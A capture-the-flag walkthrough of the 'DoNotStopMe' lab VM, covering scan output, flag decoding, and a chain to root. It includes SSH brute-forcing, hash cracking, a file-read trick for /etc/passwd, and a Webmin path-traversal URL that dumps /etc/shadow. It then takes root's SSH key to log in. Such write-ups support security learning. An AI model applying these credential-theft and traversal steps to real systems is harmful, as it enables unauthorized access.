+ http://D0Not5topMe.ctf/images/icons/smile/index.htm (CODE:200|SIZE:169)      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/acp/ ----
+ http://D0Not5topMe.ctf/language/en/acp/index.htm (CODE:200|SIZE:169)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/email/ ----
+ http://D0Not5topMe.ctf/language/en/email/index.htm (CODE:200|SIZE:169)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/developer/ ----
+ http://D0Not5topMe.ctf/manual/da/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/faq/ ----
+ http://D0Not5topMe.ctf/manual/da/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/howto/ ----
+ http://D0Not5topMe.ctf/manual/da/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/misc/ ----
+ http://D0Not5topMe.ctf/manual/da/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/mod/ ----
+ http://D0Not5topMe.ctf/manual/da/mod/index.html (CODE:200|SIZE:22377)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/programs/ ----
+ http://D0Not5topMe.ctf/manual/da/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/ssl/ ----
+ http://D0Not5topMe.ctf/manual/da/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/developer/ ----
+ http://D0Not5topMe.ctf/manual/de/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/faq/ ----
+ http://D0Not5topMe.ctf/manual/de/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/howto/ ----
+ http://D0Not5topMe.ctf/manual/de/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/misc/ ----
+ http://D0Not5topMe.ctf/manual/de/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/mod/ ----
+ http://D0Not5topMe.ctf/manual/de/mod/index.html (CODE:200|SIZE:22569)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/programs/ ----
+ http://D0Not5topMe.ctf/manual/de/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/ssl/ ----
+ http://D0Not5topMe.ctf/manual/de/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/developer/ ----
+ http://D0Not5topMe.ctf/manual/en/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/faq/ ----
+ http://D0Not5topMe.ctf/manual/en/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/howto/ ----
+ http://D0Not5topMe.ctf/manual/en/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/misc/ ----
+ http://D0Not5topMe.ctf/manual/en/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/mod/ ----
+ http://D0Not5topMe.ctf/manual/en/mod/index.html (CODE:200|SIZE:22377)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/programs/ ----
+ http://D0Not5topMe.ctf/manual/en/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/ssl/ ----
+ http://D0Not5topMe.ctf/manual/en/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/developer/ ----
+ http://D0Not5topMe.ctf/manual/es/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/faq/ ----
+ http://D0Not5topMe.ctf/manual/es/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/howto/ ----
+ http://D0Not5topMe.ctf/manual/es/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/misc/ ----
+ http://D0Not5topMe.ctf/manual/es/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/mod/ ----
+ http://D0Not5topMe.ctf/manual/es/mod/index.html (CODE:200|SIZE:22752)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/programs/ ----
+ http://D0Not5topMe.ctf/manual/es/programs/index.html (CODE:200|SIZE:6298)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/ssl/ ----
+ http://D0Not5topMe.ctf/manual/es/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/developer/ ----
+ http://D0Not5topMe.ctf/manual/fr/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/faq/ ----
+ http://D0Not5topMe.ctf/manual/fr/faq/index.html (CODE:200|SIZE:3604)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/howto/ ----
+ http://D0Not5topMe.ctf/manual/fr/howto/index.html (CODE:200|SIZE:7136)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/misc/ ----
+ http://D0Not5topMe.ctf/manual/fr/misc/index.html (CODE:200|SIZE:5407)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/mod/ ----
+ http://D0Not5topMe.ctf/manual/fr/mod/index.html (CODE:200|SIZE:24329)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/programs/ ----
+ http://D0Not5topMe.ctf/manual/fr/programs/index.html (CODE:200|SIZE:7185)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/ssl/ ----
+ http://D0Not5topMe.ctf/manual/fr/ssl/index.html (CODE:200|SIZE:5191)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/developer/ ----
+ http://D0Not5topMe.ctf/manual/ja/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/faq/ ----
+ http://D0Not5topMe.ctf/manual/ja/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/howto/ ----
+ http://D0Not5topMe.ctf/manual/ja/howto/index.html (CODE:200|SIZE:7723)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/misc/ ----
+ http://D0Not5topMe.ctf/manual/ja/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/mod/ ----
+ http://D0Not5topMe.ctf/manual/ja/mod/index.html (CODE:200|SIZE:23684)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/programs/ ----
+ http://D0Not5topMe.ctf/manual/ja/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/ssl/ ----
+ http://D0Not5topMe.ctf/manual/ja/ssl/index.html (CODE:200|SIZE:5274)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/developer/ ----
+ http://D0Not5topMe.ctf/manual/ko/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/faq/ ----
+ http://D0Not5topMe.ctf/manual/ko/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/howto/ ----
+ http://D0Not5topMe.ctf/manual/ko/howto/index.html (CODE:200|SIZE:6373)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/misc/ ----
+ http://D0Not5topMe.ctf/manual/ko/misc/index.html (CODE:200|SIZE:5197)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/mod/ ----
+ http://D0Not5topMe.ctf/manual/ko/mod/index.html (CODE:200|SIZE:21813)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/programs/ ----
+ http://D0Not5topMe.ctf/manual/ko/programs/index.html (CODE:200|SIZE:5773)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/ssl/ ----
+ http://D0Not5topMe.ctf/manual/ko/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/developer/ ----
+ http://D0Not5topMe.ctf/manual/tr/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/faq/ ----
+ http://D0Not5topMe.ctf/manual/tr/faq/index.html (CODE:200|SIZE:3612)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/howto/ ----
+ http://D0Not5topMe.ctf/manual/tr/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/misc/ ----
+ http://D0Not5topMe.ctf/manual/tr/misc/index.html (CODE:200|SIZE:5339)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/mod/ ----
+ http://D0Not5topMe.ctf/manual/tr/mod/index.html (CODE:200|SIZE:22660)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/programs/ ----
+ http://D0Not5topMe.ctf/manual/tr/programs/index.html (CODE:200|SIZE:7405)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/ssl/ ----
+ http://D0Not5topMe.ctf/manual/tr/ssl/index.html (CODE:200|SIZE:5196)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/developer/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/faq/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/howto/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/misc/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/mod/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/programs/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833) 
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ssl/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)      
                                                                               
-----------------
END_TIME: Fri May 12 13:27:48 2017
DOWNLOADED: 433528 - FOUND: 96

While the scan kept running in the background, I tried to register, and something in the header information caught my attention.

Looking at http://d0not5topme.ctf/FLaR6yF1nD3rZ_html, we see:

+++++ +++[- >++++ ++++< ]>+++ +++.+ +++++ .<+++ +[->- ---<] >---- ----.
++.<+ +++++ [->++ ++++< ]>+++ ++.<+ +++++ [->-- ----< ]>--- ----. +++++
+.<++ +++++ [->++ +++++ <]>++ +.<++ +++++ [->-- ----- <]>-- ----- -----
-.++. <++++ ++[-> +++++ +<]>+ +++++ +++++ +.<++ ++[-> ++++< ]>+++ +.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ [->++ +++++ +<]>+ .++++ ++.<+
+++++ ++[-> ----- ---<] >---. <++++ +++[- >++++ +++<] >++++ +++++ ++++.
<+++[ ->--- <]>-- ---.< +++++ ++[-> ----- --<]> .+.+. ----- -.+++ +++++
+.-.- ---.< +++++ ++[-> +++++ ++<]> ..-.- .++++ +.++. +++++ ++++. <++++
+++[- >---- ---<] >---- ----- --.-- ---.< +++++ ++[-> +++++ ++<]> +++++
.<+++ [->++ +<]>+ +.++. --.++ .<+++ ++++[ ->--- ----< ]>--- ----- ---.<

Since I did not recognize it either, I asked the group about the text and learned that it is Brainfuck 🙂 Thanks to my brother Gökay. Let's also give Çağatay a plug.

https://github.com/cagataycali/awesome-brainfuck

When we run the code, the flag appears: FL46_4:n02bv1rx5se4560984eedchjs72hsusu9. At this point, though, I realize that I skipped the third flag. I started over from scratch and saw that I had overlooked the SMTP port (it cost me hours).

With the command nc -vv 172.189.64.225 25 I got the data that the service sends.

Decoding the hex data gave the result below.

46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a

FL46_3:29dryf67uheht2r1dd4qppuey474svxya

While trying to make the site throw an error, I saw the e-mail address, and with that we had found our new site.

While examining the site's source, I found a new address inside game.js and continued from there.

In the game that came up, instead of playing it I again looked at the source code, and we got the new address.

After adding the new site to the /etc/hosts file, I try running commands in the terminal. The password is t3rm1n4l.ctf; after finding it, I find the new address to be M36u574.ctf. I could not find any data on the site other than images. While doing EXIF and steganography analysis, I saw base64 data in the description of the image "kingmegusta.jpg".

TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kOTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JOUHhRbnlkc0x6UUd2WU9VODRCMm5ZL080MHBaMzAK

MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30

MeGustaKing:**********

After cracking the password with hashcat as well, I try an SSH connection. (And we got trolled 🙂)

U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==

Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$&

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey 
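The two decodes above (the hex bytes from the SMTP banner and the base64 blob that hides a second base64 string) as one added Python example, not part of the original write-up: it peels encodings layer by layer and notes why the "Salted__" buffer cannot simply be decrypted. The function names, the 16-character minimum run and the 0.6 printable-ratio threshold are choices made for this example.

```python
import base64
import binascii
import re

# Values copied from the page: the hex bytes read from the SMTP banner and the
# base64 blob that decodes to an OpenSSL-looking "Salted__" buffer.
SMTP_HEX = ("46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 "
            "31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a")
SALTED_B64 = ("U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFj"
              "VEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==")

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
HEX_DUMP = re.compile(rb"(?:[0-9A-Fa-f]{2}\s+){7,}[0-9A-Fa-f]{2}")
REPLACEMENT = "\ufffd".encode("utf-8")   # bytes EF BF BD


def printable_ratio(blob):
    """Share of bytes that are printable ASCII or common whitespace."""
    if not blob:
        return 0.0
    ok = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(blob)


def try_base64(run):
    """Strictly decode one candidate run; None if it is not valid base64."""
    if len(run) % 4:
        return None
    try:
        return base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel(blob, max_depth=4, depth=1):
    """Return [(depth, encoding, decoded_bytes)] for every layer found."""
    layers = []
    if depth > max_depth:
        return layers
    found = []
    text = blob.strip()
    if HEX_DUMP.fullmatch(text):          # whole input is "xx xx xx ..."
        found.append(("hex", bytes.fromhex(text.decode("ascii"))))
    for match in B64_RUN.finditer(blob):  # base64 runs embedded in other bytes
        decoded = try_base64(match.group())
        # The printable check drops ordinary words that merely happen to be
        # built from base64-alphabet characters.
        if decoded and printable_ratio(decoded) >= 0.6:
            found.append(("base64", decoded))
    for encoding, decoded in found:
        layers.append((depth, encoding, decoded))
        layers.extend(peel(decoded, max_depth, depth + 1))
    return layers


def describe(blob):
    """Triage notes for a decoded layer."""
    notes = []
    if blob.startswith(b"Salted__"):
        notes.append("starts with the OpenSSL enc 'Salted__' header")
    count = blob.count(REPLACEMENT)
    if count:
        notes.append(f"{count} U+FFFD sequences: the binary part was damaged "
                     "by a text conversion and cannot be decrypted as-is")
    return notes


if __name__ == "__main__":
    for sample in (SMTP_HEX, SALTED_B64):
        for depth, encoding, decoded in peel(sample.encode("ascii")):
            print(depth, encoding, decoded, describe(decoded))
```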

With the information we had gathered, I carried out a brute-force attempt for the SSH connection.

What came next was the part I struggled with most. Because commands such as id, cat, etc. did not work, I could either use the form echo "$(</etc/passwd)" or use the SSH feature of appending cat /etc/passwd to the end of the command.

After this I got stuck and started trying Linux enumeration scripts.

There was an executable script, /usr/bin/wmstrt. When I ran it, it counted down from 20 and printed "D1dyaCatchaT3nK1l0? ". I wish I could write here the reaction I gave in English 🙂
After thinking a bit, I saw that port 10000 was active. Because the service stopped after 20 seconds, with a little research I put it in a loop like this: for i in {1..1000..1}; do echo $(/usr/bin/wmstrt); done

When I opened the running service, it pointed to an HTTPS connection.

When I connected over SSL, I saw that WebAdmin was running, and finding its vulnerability was not hard 🙂

https://172.189.64.225:10000/unauthenticated/..%01/..%01/..%01/..%01/etc/shadow
root:$6$6BxJZ5xd$x84bX7slaDzCWbtdQxNjVC92B7YrXlBsUCYVpsoI.MFqcT1tnoTMgXTK6O8Pkm1I7pS/7FvgagDWdkpliygQw1:17260:0:99999:7:::
daemon:*:17253:0:99999:7:::
bin:*:17253:0:99999:7:::
sys:*:17253:0:99999:7:::
sync:*:17253:0:99999:7:::
games:*:17253:0:99999:7:::
man:*:17253:0:99999:7:::
lp:*:17253:0:99999:7:::
mail:*:17253:0:99999:7:::
news:*:17253:0:99999:7:::
uucp:*:17253:0:99999:7:::
proxy:*:17253:0:99999:7:::
www-data:*:17253:0:99999:7:::
backup:*:17253:0:99999:7:::
list:*:17253:0:99999:7:::
irc:*:17253:0:99999:7:::
gnats:*:17253:0:99999:7:::
nobody:*:17253:0:99999:7:::
systemd-timesync:*:17253:0:99999:7:::
systemd-network:*:17253:0:99999:7:::
systemd-resolve:*:17253:0:99999:7:::
systemd-bus-proxy:*:17253:0:99999:7:::
Debian-exim:!:17253:0:99999:7:::
messagebus:*:17253:0:99999:7:::
statd:*:17253:0:99999:7:::
avahi-autoipd:*:17253:0:99999:7:::
sshd:*:17253:0:99999:7:::
burtieo:$6$BBlsb/oG$Aw.HS4JQQ7RgwB.5puvo7yJvXpa5URKfHxUcFYJM42b0pTIkH8Dao3QYrSLADS7Ov4fstuOHHYF8K/Khvpbc//:17257:0:99999:7:::
pdns:!:17253:0:99999:7:::
mysql:!:17253:0:99999:7:::
MeGustaKing:$6$.owswwq.$CMShrXnYmTvT2naqaqCDfUyEYJp0B8MoaW5q4YqU1uOBFlE6xtOby1S7EVvmdqWO5Oe/a5lBog7LovMJC4e/9/:17259:0:99999:7:::
dnsmasq:*:17257:0:99999:7:::

After getting through this many stages, I was going to give up on the machine if that root password I had reached would not crack. While trying to find the root password, an approach from another machine came to mind:
obtaining the public and private key (/root/.ssh/id_rsa) and connecting with them.

/root/.ssh/id_rsa...

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7DA162212961C0CF94C636B47C991024
-----END RSA PRIVATE KEY-----

/root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPKVt8KEVrr80LT9ZwRsWG8w9O2vgWd99+2+xmi3WCgCR/IrhqoJqEhX9owwiaUUnyRWrj9AKDj8Neetju9rOCTJsvWAlfFgyrRXkOV9twpLcrML+LC5GsVGLH7U/R2sTpT9Ywad0yL+FTvHZ+AbYLFpml4Gbhat6Ynhcg3Q6XmxGHXkV9cd6/XCx74K8CKEtOye1REj8KDtsC329qvbp/9Dt1ZZQEAUFvLqgLJiZxmH5snWiszcO2TKQ3lUw3tLy5rA/bXe3Bf4zuEmktEuA0NW+FTLYELrBy/5PK007Uh0CQVpVS5C+tkLtqh6meAXPp7dhi/B6qGOIXpPxjpUjH [email protected]

Using the passphrase I cracked as well, I establish the connection: ssh -i id_rsa [email protected]

Result:

And so the final flag came out of the root directory.

######################################################
#                                                    #
#  W311 D0n3                                         #
#  Y0u D1d N0t5top                                   #
#  Much0 M3Gu5t4 :D                                  #
#                                                    #
#  3mrgnc3                                           #
#                                                    #
#  Hope you had fun...                               #
#  8ut...                                            #
#                                                    #
#  p.s..                                             #
#  571ll 1 M0r3 f146 :D                              #
#                                                    #
######################################################
 
FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk
N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS

This was a machine that I genuinely struggled with and that taught me something. Its author did a nice job. He deserves congratulations, which I did give 🙂

About Berk İMRAN

Cyber security researcher
